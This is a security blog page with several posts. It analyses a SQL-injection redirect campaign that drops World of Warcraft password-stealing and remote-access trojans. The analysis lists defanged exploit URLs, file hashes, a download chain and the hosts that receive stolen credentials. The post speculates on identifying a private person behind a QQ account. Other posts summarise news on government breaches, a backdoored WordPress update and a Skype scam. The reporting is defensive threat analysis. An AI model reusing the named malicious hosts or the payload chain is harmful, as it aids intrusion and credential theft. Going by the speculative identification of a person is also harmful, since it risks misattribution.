The Dark Visitor

Trojan Horse

So the Analyt’s Diary blog at viruslist.com has an article on some new mass SQL injection attack that jacks up .asp pages with redirects to browser exploits. The exploits drop one of two trojans that steal passwords and whatnot. Here is h.js:

document.write(“”);
document.write(“”);

Wordpress won’t display the script. Basically, it loads an iframe that points to two separate URLS (these URLs contain browser exploits so don’t follow them):

hxxp://vvexe.com/haha/index.html and
hxxp://www.kenya.com/faq.htm

I can’t seem to get to either of these sites at the moment. I’ll try again later.

Update:  I spent some time looking at this malware.  The two pages listed earlier in this post contain iframes to browser plug-in exploits for real player and other typical vulnerabilities.  The exploits attempt to load and run down.exe (e160f590d894a98474697ac0db987746 not packed/delphi code) which in turn downloads hxxp://www.vvexe.com/haha/down.txt to get the additional files 1.exe (a7fc8c966fdeb550fe19aba3169569be not packed/VC++), do.exe (5af5edaa2cebf1fed56ad36799b2c850 ) and cool.exe (18867d6de1a3a9241c14c22c19b51351 not packed/delphi).

1.exe is a WoW trojan and waits for passwords sent to:

grunt.wowchina.com and [kr|us|tw|eu].[version|logon].worldofwarcraft.com.  It also looks for and attempts to disable many types of security software.  It attempts to send the stolen credentials to an asp on www.yilu777.com.

do.exe is a little more interesting.  It appears to be a generic remote access trojan that sends a beacon to qq number 58836533.  A quick search for that qq number revealed that this person’s paipai account has been frozen:

So I do some more digging and find the QQ profile with a name and nick:

Searching for the nickname got me to a few blogs and profiles that had some young girl who is really into anime. Maybe her QQ account got pwn3d or maybe, just maybe she is a member of “China Girl Security”. I tried to get an add on that QQ account so I could talk to the hacker but didn’t have any luck.

Note to Chinese hackers: Please pay the tax on your WoW gold profits.

Saw this picture on a Chinese hacker website and wanted to share it.  Pakistan Sunni Muslims return from religious congregation in Multan.

We run Wordpress here at TDV and wanted to make sure others had seen this alert on a fake 2.6.4 update:

Can you find five differences between these two sites? Wordpresz.org may indeed look like WordPress.org, but the 2.6.4 release it’s distributing is on purposely backdoored in order to steal the content of cookies from those who have installed it, potentially leading to to hijacking of their WordPress blogging platforms for malicious purposes.

A Financial Times article discusses multiple security compromises in the Whitehouse network. Heike blogged already about both President-Elect Obama’s and Senator McCain’s campaign networks were compromised by foreign hackers as well. The network of my precinct committee chairperson is next. From the article:

“For a short period of time, they successfully breach a wall, and then you rebuild the wall . . . it is not as if they have continued access,” said the official. “It is constant cat and mouse on this stuff.”

As usual, the article is slim on technical details and fills in the space with general cybersecurity background. At this point, it may be easier to list the government organizations that haven’t been compromised by Chinese hackers.

This comes from Newsweek via Wired that both presidential candidates websites networks were attacked compromised .  There is a lot of speculation in the original Newsweek article which Wired duly notes:

Oddly, Newsweek reports that officials at the FBI and White House told the Obama camp that the culprit was a “foreign entity” likely seeking information on the two sides’ policy positions to use in negotiations with the next administration, and that the Obama system had not been hacked by its political opponents.

From SC Magazine on new Microsoft worm:

Microsoft rushed out the emergency patch on the 24th October, however the Wecorl worm has now been circulated. Kevin Haley, a director with Symantec’s security response team, claimed that the worm may have originated in China as it appeared to target Chinese language versions of Windows 2000.

I haven’t actually had a chance to read the whole article (long) but did a quick scan and it looks worthwhile.  Opens with background on the PLA’s current capabilities and then gets into the cyber warfare section.

Thanks to Websense Security Labs for informing us about a new advance-fee scam targeting Chinese Skype users.  Apparently, Chinese users get a message indicating that they have won a significant sum of money and prizes.  They are directed to a phishing website where they fill out contact information for the prizes but nothing too suspicious.  Finally, they are redirected to a bank transfer page where they will have to send in a fee of several hundred RMB to collect the prize.  I wonder if the officials reading Tom Skype users’ messages are falling for this too.